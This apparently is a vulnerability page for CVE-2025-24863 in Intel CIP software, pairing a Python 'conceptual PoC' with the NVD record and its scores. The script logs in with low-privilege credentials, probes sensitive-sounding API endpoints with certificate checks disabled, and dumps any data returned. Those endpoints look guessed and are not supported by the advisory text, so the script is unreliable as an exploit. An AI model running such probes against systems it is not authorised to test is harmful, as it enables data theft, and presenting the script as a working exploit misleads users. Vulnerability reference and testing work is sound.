CVE-2025-24863

# CVE-2025-24863 PoC - Intel CIP Privilege Management Issue # Note: This is a conceptual PoC demonstrating the vulnerability pattern # Actual exploitation requires authenticated access to Intel CIP software import requests import json def check_cve_2025_24863(target_ip, credentials): """ Check if target is vulnerable to CVE-2025-24863 Intel CIP software improper privilege management """ # Session establishment with low-privilege user session = requests.Session() # Authenticate with low-privilege account auth_payload = { 'username': credentials['username'], 'password': credentials['password'] } try: # Attempt authentication auth_response = session.post( f'https://{target_ip}/api/auth/login', json=auth_payload, verify=False, timeout=10 ) if auth_response.status_code == 200: # After low-privilege authentication, attempt to access # sensitive data that should require higher privileges sensitive_endpoints = [ '/api/system/config', '/api/users/privileged', '/api/credentials/store', '/api/dca/sensitive-info' ] for endpoint in sensitive_endpoints: response = session.get( f'https://{target_ip}{endpoint}', verify=False, timeout=10 ) # If low-privilege user can access privileged data if response.status_code == 200: try: data = response.json() print(f'[+] VULNERABLE: {endpoint}') print(f' Data exposed: {json.dumps(data, indent=2)}') return True except: print(f'[+] Potentially vulnerable: {endpoint}') except Exception as e: print(f'[-] Error: {e}') return False # Usage example if __name__ == '__main__': target = '192.168.1.100' creds = { 'username': 'low_privilege_user', 'password': 'user_password' } is_vulnerable = check_cve_2025_24863(target, creds) print(f'\n[*] Vulnerability status: {is_vulnerable}')

{"cve": {"id": "CVE-2025-24863", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:43.913", "lastModified": "2025-11-26T15:14:17.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper privilege management for some Intel(R) CIP software before version WIN_DCA_2.4.0.11001 within Ring 3: User Applications may allow an information disclosure. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable data exposure. This result may potentially occur via network access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:computing_improvement_program:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.11001", "matchCriteriaId": "3D1985FF-2EEE-491C-8E9D-93DA3D9B984C"}]}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01328.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}